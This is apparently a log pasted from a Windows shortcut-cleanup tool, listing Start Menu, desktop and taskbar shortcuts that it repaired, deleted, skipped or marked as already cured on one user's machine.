              [ OK ] 278 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group1\1 - Desktop.lnk” → [ “C:\Windows\explorer.exe” ] (Method RN-S) (OK)
              .
              [ATTR] 21 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Immersive Control Panel.lnk” → [ “C:\Windows\System32\control.exe” ] (OK) (attribute system was removed)
              [ATTR] 27 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PrintDialog.lnk” → [ “C:\Windows\PrintDialog\PrintDialog.exe” ] (OK) (attribute system was removed)
              .
              [DEL ] 7 “C:\ProgramData\Microsoft\Windows\Start Menu Places\08 - Homegroup.lnk” (target was not recovered)
              [DEL ] 8 “C:\ProgramData\Microsoft\Windows\Start Menu Places\09 - Network.lnk” (target was not recovered)
              [DEL ] 22 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MiracastView.lnk” (target was not recovered)
              [DEL ] 122 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Command Prompt.lnk” (target was not recovered)
              [DEL ] 123 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\computer.lnk” (target was not recovered)
              [DEL ] 124 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Control Panel.lnk” (target was not recovered)
              [DEL ] 125 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\File Explorer.lnk” (target was not recovered)
              [DEL ] 126 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Run.lnk” (target was not recovered)
              [DEL ] 137 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk” (target was not recovered)
              [DEL ] 139 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk” (target was not recovered)
              [DEL ] 145 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\01 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 147 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\02 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 159 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Command Prompt.lnk” (target was not recovered)
              [DEL ] 160 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\computer.lnk” (target was not recovered)
              [DEL ] 161 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Control Panel.lnk” (target was not recovered)
              [DEL ] 162 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\File Explorer.lnk” (target was not recovered)
              [DEL ] 163 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Run.lnk” (target was not recovered)
              [DEL ] 168 “C:\Users\Default\AppData\Roaming\Microsoft\Intern et Explorer\Quick Launch\Shows Desktop.lnk” (target was not recovered)
              [DEL ] 169 “C:\Users\Default\AppData\Roaming\Microsoft\Intern et Explorer\Quick Launch\Window Switcher.lnk” (target was not recovered)
              [DEL ] 170 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\01 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 172 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\02 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 183 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Command Prompt.lnk” (target was not recovered)
              [DEL ] 184 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\computer.lnk” (target was not recovered)
              [DEL ] 185 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Control Panel.lnk” (target was not recovered)
              [DEL ] 186 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\File Explorer.lnk” (target was not recovered)
              [DEL ] 187 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Run.lnk” (target was not recovered)
              [DEL ] 192 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\I nternet Explorer\Quick Launch\Shows Desktop.lnk” (target was not recovered)
              [DEL ] 193 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\I nternet Explorer\Quick Launch\Window Switcher.lnk” (target was not recovered)
              [DEL ] 194 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\01 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 196 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\02 - Command Prompt.lnk” (target was not recovered)
              [DEL ] 238 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Default Apps.lnk” (target was not recovered)
              [DEL ] 239 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\System Tools\Devices.lnk” (target was not recovered)
              [DEL ] 253 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Default Apps.lnk” (target was not recovered)
              [DEL ] 254 “C:\Users\Default\AppData\Roaming\Microsoft\Window s\Start Menu\Programs\System Tools\Devices.lnk” (target was not recovered)
              [DEL ] 266 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Default Apps.lnk” (target was not recovered)
              [DEL ] 267 “C:\Users\defaultuser0\AppData\Roaming\Microsoft\W indows\Start Menu\Programs\System Tools\Devices.lnk” (target was not recovered)
              [DEL ] 279 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy\Speccy Homepage.url”
              [DEL ] 280 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online Website.url”
              [DEL ] 281 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Help\Online Codec Help.url”
              [DEL ] 282 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Website.url”
              [DEL ] 283 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox Website.URL”
              [DEL ] 284 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner Homepage.url”
              [DEL ] 285 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 ReadMe.url”
              [DEL ] 286 “C:\Users\ASUS\Favorites\Bing.url”
              [DEL ] 287 “C:\Users\ASUS\Favorites\The NeoSmart Files.url”
              .
              [SKIP] 18 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader XI.lnk → C:\Windows\Installer{AC76BA86-7AD7-1033-7B44-AB0000000001}\SC_Reader.ico” (shortcut was not found)
              [SKIP] 33 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\Console RAR manual.lnk → C:\Program Files\WinRAR\Rar.txt” (shortcut was not found)
              [SKIP] 34 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\What is new in the latest version.lnk → C:\Program Files\WinRAR\WhatsNew.txt” (shortcut was not found)
              [SKIP] 38 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\What’s New.lnk → C:\Program Files (x86)\Winamp\whatsnew.txt” (shortcut was not found)
              [SKIP] 58 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Changelog.lnk → D:\Program Files (x86)\HxD\changelog.txt” (shortcut was not found)
              [SKIP] 60 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\License.lnk → D:\Program Files (x86)\HxD\license.txt” (shortcut was not found)
              [SKIP] 61 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\Readme.lnk → D:\Program Files (x86)\HxD\readme.txt” (shortcut was not found)
              [SKIP] 99 “C:\Users\ASUS\Desktop\chrome - Shortcut.lnk” (shortcut was not found)
              [SKIP] 113 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\WinRAR\Console RAR manual.lnk → C:\Program Files\WinRAR\Rar.txt” (shortcut was not found)
              [SKIP] 114 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\WinRAR\What is new in the latest version.lnk → C:\Program Files\WinRAR\WhatsNew.txt” (shortcut was not found)
              [SKIP] 127 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Sony\ Vegas Pro 13.0\Exµs â„¢.lnk → C:\Program Files\Sony\Vegas Pro 13.0\Ex\Exµs â„¢ - Home - Webs.url” (shortcut was not found)
              .
              [WARN] 2 “C:\ProgramData\Microsoft\Windows\Start Menu Places\03 - Documents.lnk” → [ “C:\Users\ASUS\Documents” ] (already cured)
              [WARN] 3 “C:\ProgramData\Microsoft\Windows\Start Menu Places\04 - Downloads.lnk” → [ “C:\Users\ASUS\Downloads” ] (already cured)
              [WARN] 4 “C:\ProgramData\Microsoft\Windows\Start Menu Places\05 - Music.lnk” → [ “C:\Users\ASUS\Music” ] (already cured)
              [WARN] 5 “C:\ProgramData\Microsoft\Windows\Start Menu Places\06 - Pictures.lnk” → [ “C:\Users\ASUS\Pictures” ] (already cured)
              [WARN] 6 “C:\ProgramData\Microsoft\Windows\Start Menu Places\07 - Videos.lnk” → [ “C:\Users\ASUS\Videos” ] (already cured)
              [WARN] 9 “C:\ProgramData\Microsoft\Windows\Start Menu Places\10 - UserProfile.lnk” → [ “C:\Users\ASUS” ] (already cured)
              [WARN] 10 “C:\ProgramData\Microsoft\Windows\Start Menu\SmartAudio.lnk” → [ “C:\Program Files\CONEXANT\SAII\SmartAudio.exe” ] (already cured)
              [WARN] 11 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\MSACCESS.EXE” ] (already cured)
              [WARN] 12 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS6 (64bit).lnk” → [ “C:\Program Files\Adobe\Adobe Bridge CS6 (64 Bit)\Bridge.exe” ] (already cured)
              [WARN] 13 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS6.lnk” → [ “C:\Program Files (x86)\Adobe\Adobe Bridge CS6\Bridge.exe” ] (already cured)
              [WARN] 14 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit CS6.lnk” → [ “C:\Program Files (x86)\Adobe\Adobe Utilities - CS6\ExtendScript Toolkit CS6\ExtendScript Toolkit.exe” ] (already cured)
              [WARN] 15 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Extension Manager CS6.lnk” → [ “C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Adobe Extension Manager CS6.exe” ] (already cured)
              [WARN] 16 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6 (64 Bit).lnk” → [ “C:\Program Files\Adobe\Adobe Photoshop CS6 (64 Bit)\Photoshop.exe” ] (already cured)
              [WARN] 17 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6.lnk” → [ “C:\Program Files (x86)\Adobe\Adobe Photoshop CS6\Photoshop.exe” ] (already cured)
              [WARN] 19 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE” ] (already cured)
              [WARN] 20 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” ] (already cured)
              [WARN] 24 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE” ] (already cured)
              [WARN] 25 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE” ] (already cured)
              [WARN] 26 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE” ] (already cured)
              [WARN] 28 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Project 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\WINPROJ.EXE” ] (already cured)
              [WARN] 29 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk” → [ “D:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe” ] (already cured)
              [WARN] 30 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visio 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\VISIO.EXE” ] (already cured)
              [WARN] 31 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE” ] (already cured)
              [WARN] 35 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR help.lnk” → [ “C:\Program Files\WinRAR\WinRAR.chm” ] (already cured)
              [WARN] 36 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR\WinRAR.lnk” → [ “C:\Program Files\WinRAR\WinRAR.exe” ] (already cured)
              [WARN] 37 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Uninstall Winamp.lnk” → [ “C:\Program Files (x86)\Winamp\UninstWA.exe” ] (already cured)
              [WARN] 39 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp\Winamp.lnk” → [ “C:\Program Files (x86)\Winamp\winamp.exe” ] (already cured)
              [WARN] 41 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Speccy\Speccy.lnk” → [ “C:\Program Files\Speccy\Speccy64.exe” ] (already cured)
              [WARN] 42 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype\Skype.lnk” → [ “C:\Program Files (x86)\Skype\Phone\Skype.exe” ] (already cured)
              [WARN] 43 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Razer\Razer Cortex\Razer Cortex.lnk” → [ “D:\Program Files (x86)\Razer\Razer Cortex\CortexLauncher.exe” ] (already cured)
              [WARN] 44 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online (Test Server).lnk” → [ “D:\Games\Ragnarok\iRO\RO Online\Sakray.exe” ] (already cured)
              [WARN] 45 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online Classic.lnk” → [ “D:\Games\Ragnarok\iRO\RO Online\ClassicRO.exe” ] (already cured)
              [WARN] 46 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ragnarok Online\Ragnarok Online.lnk” → [ “D:\Games\Ragnarok\iRO\RO Online\Ragnarok.exe” ] (already cured)
              [WARN] 47 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\GeForce Experience.lnk” → [ “C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe” ] (already cured)
              [WARN] 48 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Office 2016 Language Preferences.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\SETLANG.EXE” ] (already cured)
              [WARN] 49 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Telemetry Dashboard for Office 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\msotd.exe” ] (already cured)
              [WARN] 50 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\Telemetry Log for Office 2016.lnk” → [ “C:\Program Files\Microsoft Office\root\Office16\msoev.exe” ] (already cured)
              [WARN] 52 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Media Player Classic.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\MPC-HC64\mpc-hc64_nvo.exe” ] (already cured)
              [WARN] 54 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext (x64).lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext64.exe” ] (already cured)
              [WARN] 55 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\GraphStudioNext.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\Tools\GraphStudioNext.exe” ] (already cured)
              [WARN] 56 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Tools\MediaInfo.lnk” → [ “C:\Program Files (x86)\K-Lite Codec Pack\Tools\mediainfo.exe” ] (already cured)
              [WARN] 57 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ICEpower\AudioWizard\AudioWizard.lnk ” → [ “C:\Program Files (x86)\ICEpower\AudioWizard\AudioWizard.exe” ] (already cured)
              [WARN] 59 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HxD Hex Editor\HxD.lnk” → [ “D:\Program Files (x86)\HxD\HxD.exe” ] (already cured)
              [WARN] 62 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Hotspot Shield\Hotspot Shield.lnk” → [ “C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe” ] (already cured)
              [WARN] 63 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Conexant\SAII\SmartAudio.lnk” → [ “C:\Program Files\CONEXANT\SAII\SmartAudio.exe” ] (already cured)
              [WARN] 64 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner\CCleaner.lnk” → [ “C:\Program Files\CCleaner\CCleaner64.exe” ] (already cured)
              [WARN] 65 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattlePing\BattlePing.lnk” → [ “D:\Program Files (x86)\BattlePing\BattlePing.exe” ] (already cured)
              [WARN] 66 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BattlePing\Uninstall BattlePing.lnk” → [ “D:\Program Files (x86)\BattlePing\Uninstall.exe” ] (already cured)
              [WARN] 67 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG\AVG Protection.lnk” → [ “C:\Program Files (x86)\AVG\Av\avgui.exe” ] (already cured)
              [WARN] 68 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\ASUS Touchpad Handwriting.lnk” → [ “C:\Program Files (x86)\ASUS\ASUS Touchpad Handwriting\Exe\x64\AsusTPHandWriting64.exe” ] (already cured)
              [WARN] 69 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\eManual.Lnk” → [ “C:\eSupport\Manual\eManual.exe” ] (already cured)
              [WARN] 70 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS\WinFlash.Lnk” → [ “C:\Program Files (x86)\ASUS\WinFlash\WinFlash.exe” ] (already cured)
              [WARN] 71 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ArcSoft WebCam Companion 3\WebCam Companion 3.lnk” → [ “C:\Program Files (x86)\ArcSoft\WebCam Companion 3\uWebCam.exe” ] (already cured)
              [WARN] 84 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 Device Detector.lnk” → [ “C:\Program Files (x86)\Common Files\ACD Systems\EN\DevDetect.exe” ] (already cured)
              [WARN] 85 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3 Showroom.lnk” → [ “C:\Program Files (x86)\ACD Systems\ACDSee Pro\3.0\ACDSeeSR.exe” ] (already cured)
              [WARN] 86 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ACD Systems\ACDSee Pro 3.lnk” → [ “C:\Program Files (x86)\ACD Systems\ACDSee Pro\3.0\ACDSeePro3.exe” ] (already cured)
              [WARN] 97 “C:\Users\ASUS\Links\Desktop.lnk” → [ “C:\Users\ASUS\Desktop” ] (already cured)
              [WARN] 98 “C:\Users\ASUS\Links\Downloads.lnk” → [ “C:\Users\ASUS\Downloads” ] (already cured)
              [WARN] 100 “C:\Users\ASUS\Desktop\opensetup - Shortcut.lnk” → [ “D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\opensetup.exe” ] (already cured)
              [WARN] 101 “C:\Users\ASUS\Desktop\Spotify.lnk” → [ “C:\Users\ASUS\AppData\Roaming\Spotify\Spotify.exe ” ] (already cured)
              [WARN] 102 “C:\Users\ASUS\Desktop\Pinned to Taskbar\BattlePing.lnk” → [ “D:\Program Files (x86)\BattlePing\BattlePing.exe” ] (already cured)
              [WARN] 103 “C:\Users\ASUS\Desktop\Pinned to Taskbar\Ragnarok.lnk” → [ “D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragnarok.exe” ] (already cured)
              [WARN] 104 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Vegas Pro 13.0 (64-bit).lnk” → [ “C:\Program Files\Sony\Vegas Pro 13.0\vegas130.exe” ] (already cured)
              [WARN] 105 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\bdcam.lnk” → [ “D:\Program Files (x86)\Bandicam\bdcam.exe” ] (already cured)
              [WARN] 106 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Google Chrome.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” ] (already cured)
              [WARN] 107 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\GRF Editor.lnk” → [ “D:\Games\Ragnarok\Editing Ragnarok\GRF Editor\GRF Editor.exe” ] (already cured)
              [WARN] 108 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\hookup.lnk” → [ “D:\Cheat Engine 6.6\hookup.exe” ] (already cured)
              [WARN] 109 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Internet Explorer.lnk” → [ “C:\Program Files\Internet Explorer\iexplore.exe” ] (already cured)
              [WARN] 110 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\OneDrive.lnk” → [ “C:\Users\ASUS\AppData\Local\Microsoft\OneDrive\On eDrive.exe” ] (already cured)
              [WARN] 111 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Optional Features.lnk” → [ “C:\Windows\System32\fodhelper.exe” ] (already cured)
              [WARN] 112 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Spotify.lnk” → [ “C:\Users\ASUS\AppData\Roaming\Spotify\Spotify.exe ” ] (already cured)
              [WARN] 115 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\WinRAR\WinRAR help.lnk” → [ “C:\Program Files\WinRAR\WinRAR.chm” ] (already cured)
              [WARN] 116 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\WinRAR\WinRAR.lnk” → [ “C:\Program Files\WinRAR\WinRAR.exe” ] (already cured)
              [WARN] 121 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Winamp Detector Plug-in\Uninstall Winamp Detector Plug-in.lnk” → [ “C:\Program Files (x86)\Winamp Detect\UninstWaDetect.exe” ] (already cured)
              [WARN] 128 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Sony\ Vegas Pro 13.0\Vegas Pro 13.0 Readme.lnk” → [ “C:\Program Files\Sony\Vegas Pro 13.0\Readme\Vegas_readme.htm” ] (already cured)
              [WARN] 129 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Sony\ Vegas Pro 13.0\Vegas Pro 13.0.lnk” → [ “C:\Program Files\Sony\Vegas Pro 13.0\vegas130.exe” ] (already cured)
              [WARN] 130 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S tart Menu\Programs\Accessories\Internet Explorer.lnk” → [ “C:\Program Files\Internet Explorer\iexplore.exe” ] (already cured)
              [WARN] 135 “C:\Users\ASUS\AppData\Roaming\Microsoft\Windows\S endTo\Bluetooth File Transfer.LNK” → [ “C:\Windows\System32\fsquirt.exe” ] (already cured)
              [WARN] 136 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” ] (already cured)
              [WARN] 138 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Winamp.lnk” → [ “C:\Program Files (x86)\Winamp\winamp.exe” ] (already cured)
              [WARN] 140 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BattlePing.lnk” → [ “D:\Program Files (x86)\BattlePing\BattlePing.exe” ] (already cured)
              [WARN] 142 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Ragnarok.lnk” → [ “D:\Games\Ragnarok\iRO\Gravity\openkore\Ragnarok Online\Ragnarok.exe” ] (already cured)
              [WARN] 143 “C:\Users\ASUS\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk” → [ “C:\Program Files\Internet Explorer\iexplore.exe” ] (already cured)
              [WARN] 149 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\03 - Computer Management.lnk” → [ “C:\Windows\System32\compmgmt.msc” ] (already cured)
              [WARN] 150 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\04 - Disk Management.lnk” → [ “C:\Windows\System32\diskmgmt.msc” ] (already cured)
              [WARN] 151 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\07 - Event Viewer.lnk” → [ “C:\Windows\System32\eventvwr.exe” ] (already cured)
              [WARN] 152 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group3\09 - Mobility Center.lnk” → [ “C:\Windows\system32\mblctr.exe” ] (already cured)
              [WARN] 153 “C:\Users\ASUS\AppData\Local\Microsoft\Windows\Win X\Group2\4 - Control Panel.lnk” → [ “C:\Windows\System32\control.exe” ] (already cured)
              [WARN] 174 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\03 - Computer Management.lnk” → [ “C:\Windows\System32\compmgmt.msc” ] (already cured)
              [WARN] 175 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\04 - Disk Management.lnk” → [ “C:\Windows\System32\diskmgmt.msc” ] (already cured)
              [WARN] 176 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\07 - Event Viewer.lnk” → [ “C:\Windows\System32\eventvwr.exe” ] (already cured)
              [WARN] 177 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group3\09 - Mobility Center.lnk” → [ “C:\Windows\system32\mblctr.exe” ] (already cured)
              [WARN] 178 “C:\Users\Default\AppData\Local\Microsoft\Windows\ WinX\Group2\4 - Control Panel.lnk” → [ “C:\Windows\System32\control.exe” ] (already cured)
              [WARN] 198 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\03 - Computer Management.lnk” → [ “C:\Windows\System32\compmgmt.msc” ] (already cured)
              [WARN] 199 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\04 - Disk Management.lnk” → [ “C:\Windows\System32\diskmgmt.msc” ] (already cured)
              [WARN] 200 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\07 - Event Viewer.lnk” → [ “C:\Windows\System32\eventvwr.exe” ] (already cured)
              [WARN] 201 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group3\09 - Mobility Center.lnk” → [ “C:\Windows\system32\mblctr.exe” ] (already cured)
              [WARN] 202 “C:\Users\defaultuser0\AppData\Local\Microsoft\Win dows\WinX\Group2\4 - Control Panel.lnk” → [ “C:\Windows\System32\control.exe” ] (already cured)
              [WARN] 203 “C:\Users\Public\Desktop\BattlePing.lnk” → [ “D:\Program Files (x86)\BattlePing\BattlePing.exe” ] (already cured)
              [WARN] 204 “C:\Users\Public\Desktop\CCleaner.lnk” → [ “C:\Program Files\CCleaner\CCleaner64.exe” ] (already cured)
              [WARN] 205 “C:\Users\Public\Desktop\GeForce Experience.lnk” → [ “C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe” ] (already cured)
              [WARN] 206 “C:\Users\Public\Desktop\Google Chrome.lnk” → [ “C:\Program Files (x86)\Google\Chrome\Application\chrome.exe” ] (already cured)
              [WARN] 207 “C:\Users\Public\Desktop\Hotspot Shield.lnk” → [ “C:\Program Files (x86)\Hotspot Shield\bin\hsscp.exe” ] (already cured)
              [WARN] 209 “C:\Users\Public\Desktop\Speccy.lnk” → [ “C:\Program Files\Speccy\Speccy64.exe” ] (already cured)
              [WARN] 210 “C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk” → [ “D:\Program Files\TeamSpeak 3 Client\ts3client_win64.exe” ] (already cured)
              [WARN] 228 “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox.lnk” → [ “C:\Program Files (x86)\Dropbox\Client\Dropbox.exe” /home ] (already cured)
              .
              ____________________________ Icons location _____________________________
              .
              [ OK ] “C:\ProgramData\Microsoft\Windows\Start Menu Places\01 - File Explorer.lnk” → [ “.”, index=1 ] (Method: 3)
